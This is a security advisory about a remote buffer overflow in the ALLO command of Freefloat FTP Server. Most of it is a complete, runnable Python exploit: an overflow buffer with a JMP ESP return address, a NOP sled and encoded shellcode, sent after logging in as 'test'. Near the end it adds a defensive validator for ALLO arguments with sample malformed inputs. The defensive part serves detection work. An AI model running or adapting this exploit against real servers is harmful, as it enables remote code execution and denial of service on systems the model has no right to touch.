Freefloat FTP Server "ALLO" Command Remote Buffer Overflow Vulnerability

Published: 2011-08-20
Updated: 2011-08-20

Affected systems:
Freefloat Freefloat FTP Server
Description:
BUGTRAQ  ID: 49265

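Freefloat FTP Server is free software for uploading files and managing wired and wireless devices.

The ALLO command implementation in Freefloat FTP Server contains a remote buffer overflow vulnerability. A remote attacker can exploit it to execute arbitrary code in the affected application, and may also cause a denial of service.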

<*Source: Black.Spook
  *>

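Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!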

import socket
import sys

def usage():

        print "usage  : ./freefloatftp.py <victim_ip>  <victim_port>"
        print "example: ./freefloatftp.py 192.168.1.100 21"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


print "\n"    
print "#############################################################################"
print "#      Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit      #"
print "#############################################################################"
print "\n"


if len(sys.argv) != 3:
    usage()
    sys.exit()

ip   = sys.argv[1]
port = sys.argv[2]

junk1= "\x41" * 246
ret  = "\xED\x1E\x94\x7C" #7C941EED JMP ESP
nop  = "\x90"* 200
# windows/exec          CMD=calc.exe
shellcode =("\x89\xe3\xdb\xd4\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49"
            "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
            "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
            "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
            "\x42\x75\x4a\x49\x4d\x6f\x58\x70\x56\x4f\x54\x70\x4d\x6e"
            "\x58\x59\x58\x4b\x54\x69\x5a\x69\x4d\x61\x56\x53\x4b\x69"
            "\x52\x54\x45\x74\x4b\x44\x43\x6a\x45\x61\x50\x7a\x45\x42"
            "\x4d\x53\x58\x42\x54\x44\x43\x33\x4d\x5a\x45\x71\x58\x52"
            "\x50\x4b\x4d\x46\x5a\x76\x4d\x4b\x4c\x74\x43\x56\x45\x77"
            "\x49\x6c\x45\x6d\x4c\x43\x56\x76\x54\x6e\x56\x39\x4b\x70"
            "\x54\x4b\x4b\x4e\x51\x39\x4d\x54\x4d\x77\x51\x65\x51\x6f"
            "\x45\x6c\x54\x73\x49\x6b\x4d\x78\x45\x63\x4c\x34\x58\x36"
            "\x4e\x6e\x50\x7a\x47\x75\x54\x37\x56\x6f\x58\x50\x4b\x75"
            "\x47\x69\x49\x63\x47\x5a\x54\x5a\x4b\x4a\x5a\x6a\x4b\x55"
            "\x50\x6f\x4b\x4b\x54\x4b\x45\x4b\x4d\x4f\x4d\x79\x58\x44"
            "\x56\x30\x54\x72\x51\x4e\x51\x70\x47\x54\x4e\x6f\x43\x6f"
            "\x4e\x46\x51\x33\x4c\x6f\x56\x47\x5a\x63\x5a\x53\x43\x74"
            "\x5a\x32\x49\x5a\x45\x73\x58\x74\x4e\x49\x4e\x65\x4b\x6b"
            "\x51\x6e\x49\x65\x50\x35\x49\x4a\x51\x43\x5a\x45\x56\x6a"
            "\x4d\x45\x4e\x38\x49\x4e\x49\x69\x56\x44\x54\x49\x54\x6f"
            "\x47\x71\x52\x37\x50\x75\x49\x6c\x47\x4c\x4e\x78\x50\x78"
            "\x4b\x4c\x52\x59\x47\x6e\x45\x33\x4c\x4b\x52\x51\x51\x4d"
            "\x47\x6e\x4e\x6c\x43\x71\x47\x6c\x4f\x34\x56\x79\x43\x64"
            "\x4c\x46\x4e\x6f\x4f\x4a\x4d\x6c\x56\x57\x47\x33\x43\x6c"
            "\x47\x46\x47\x4b\x47\x58\x45\x7a\x54\x50\x43\x6f\x4e\x4f"
            "\x4b\x4f\x54\x6a\x51\x4b\x54\x64\x49\x6e\x4b\x4c\x5a\x4a"
            "\x51\x6e\x56\x45\x4e\x39\x4c\x77\x54\x65\x43\x74\x54\x38"
            "\x47\x6d\x4c\x4b\x50\x79\x4c\x5a\x58\x79\x50\x74\x4b\x6c"
            "\x4e\x30\x5a\x4b\x51\x71\x52\x46\x4d\x6b\x45\x31\x51\x67"
            "\x58\x6a\x4b\x71\x5a\x6c\x52\x57\x4b\x44\x4b\x79\x51\x6e"
            "\x54\x50\x4f\x35\x43\x72\x56\x71\x50\x67\x5a\x7a\x4b\x30"
            "\x50\x56\x4f\x67\x4e\x70\x4b\x39\x49\x6e\x50\x30\x43\x4d"
            "\x51\x48\x52\x63\x51\x4d\x51\x6e\x58\x36\x4b\x37\x56\x38"
            "\x49\x6d\x54\x73\x52\x57\x4f\x6f\x47\x6d\x45\x66\x51\x62"
            "\x4b\x6b\x4c\x59\x4f\x5a\x54\x4e\x54\x34\x52\x6c\x58\x4d"
            "\x4d\x6d\x50\x75\x51\x55\x4c\x6e\x45\x70\x58\x66\x54\x45"
            "\x47\x6f\x5a\x67\x4c\x4e\x4e\x4c\x51\x4f\x41\x41")


buff   = junk1 + ret + nop + shellcode

try:
    print("[-] Connecting to " + ip + " on port " + port + "\n")
    s.connect((ip,int(port)))
    data = s.recv(1024)
    print("[-] Sending exploit...")
    s.send("USER test\r\n")
    s.recv(1024)
    s.send("PASS test\r\n")
    s.recv(1024)
    s.send("ALLO "+buff+"\r\n")
    s.close()
    print("[-] Exploit successfully sent...")
except:
    print("[-] Connection error...")
    print("[-] Check if victim is up.")

Recommendation:
Vendor patch:

Freefloat
---------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.freefloat.com/
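
Added example, not part of the original advisory: a check that a proxy or sensor in front of the server could apply to the client side of the FTP control channel, accepting ALLO only when its argument matches the RFC 959 grammar (a decimal size, optionally followed by " R " and a second decimal). The function names, the 512-byte line cap, the 20-digit limit and the sample stream are assumptions constructed for illustration.

```python
import re

# RFC 959: ALLO <SP> <decimal-integer> [<SP> R <SP> <decimal-integer>] <CRLF>
# The 20-digit bound is an assumption, generous for any real file size.
ALLO_ARG = re.compile(rb"\d{1,20}(?: R \d{1,20})?")
MAX_LINE = 512  # assumed cap on one control-channel line; tune per deployment


def check_ftp_line(line: bytes):
    """Return None if the command line is acceptable, else a reason string."""
    body = line.rstrip(b"\r\n")
    if len(body) > MAX_LINE:
        return "line exceeds %d bytes" % MAX_LINE
    verb, _, arg = body.partition(b" ")
    if verb.upper() != b"ALLO":
        return None  # this check only covers ALLO
    if not ALLO_ARG.fullmatch(arg):
        return "ALLO argument is not a decimal size"
    return None


def scan_stream(stream: bytes):
    """Scan a client-to-server control stream; return (line_no, verb, reason) findings."""
    findings = []
    for no, line in enumerate(stream.split(b"\n"), 1):
        if not line.strip():
            continue
        reason = check_ftp_line(line)
        if reason:
            verb = line.split(b" ", 1)[0][:8].decode("ascii", "replace")
            findings.append((no, verb, reason))
    return findings


# Constructed sample of client commands, not captured traffic.
SAMPLE = (
    b"USER test\r\nPASS test\r\nALLO 1024\r\nALLO 4096 R 128\r\n"
    b"ALLO " + b"A" * 300 + b"\r\n"
    b"ALLO " + b"9" * 600 + b"\r\n"
)

if __name__ == "__main__":
    for finding in scan_stream(SAMPLE):
        print(finding)
```

Lines that produce a finding should be dropped or logged before they reach the server; well-formed ALLO requests pass through unchanged.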

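This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.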